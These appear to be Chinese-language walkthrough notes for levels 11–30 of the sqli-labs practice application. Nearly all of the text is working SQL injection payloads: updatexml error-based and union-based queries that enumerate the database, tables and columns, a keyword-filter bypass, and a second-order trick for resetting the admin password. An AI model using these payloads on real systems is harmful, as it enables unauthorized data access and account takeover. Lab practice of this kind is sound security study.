less11
弱口令猜测账号密码
判断闭合方式
判断列长
报错注入 查询当前数据库名
admin' and updatexml(1,concat(1,database()),1) #
报错注入 查出网站的数据库里的目标表名
admin' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #
报错注入 查出目标表中的所有列名
admin' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' )),1) #
less12
与十一关差不多,闭合方式不同,闭合方式为:") #
然后重复十二关的注入方式
查询当前数据库名
admin") and updatexml(1,concat(1,database()),1) #
查出网站的数据库里的目标表名
admin") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #
查出目标表中的所有列名
admin") and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
level 13
判断闭合方式,闭合方式为:') #
之后与之前两关一样
报错注入 查询当前数据库名
admin') and updatexml(1,concat(1,database()),1) #
报错注入 查出网站的数据库里的目标表名
admin') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) #
报错注入 查出目标表中的所有列名
admin') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
less14
判断闭方式,闭合方式为:" #
admin"and 1=1#
之后与之前一样
判断字段列数
报错注入 查询当前数据库名
admin" and updatexml(1,concat(1,database()),1) #
报错注入 查出网站的数据库里的目标表名
admin" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #
报错注入 查出目标表中的所有列名
admin" and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security'and table_name='users' )),1) #
less 15
判断闭合方式
less 23
查询数据库名
id=-1' union select 1,database(),3 and '1' = '1
less24
在注册账号时可以输入特殊字符,例如admin'#
通过查看源码可以得知在修改密码时的闭合方式为‘#
修改密码,通过将admin闭合,之后的内容不执行,达成恒真条件,完成修改管理员密码的注入
less25
提示与or和and有关,发现or和and都被过滤掉了
闭合方式为' --+
查询数据库名
?id=-1' union select 1,database(),3 --+
查询表名
由于本关卡过滤or,所以'information'需要写成‘infoorrmation’
?id=-1 ' union select 1, group_concat(table_name) ,3 from infoorrmation_schema.tables where table_schema='security' --+
less29
判断闭合方式 闭合方式为‘--+
爆库
id=-1' union select 1,(database()),3 --+
爆表
id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
less30
闭合方式为”--+
联合注入,爆库
?id=-1" union select 1,database(),3 --+
联合注入,爆表
?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+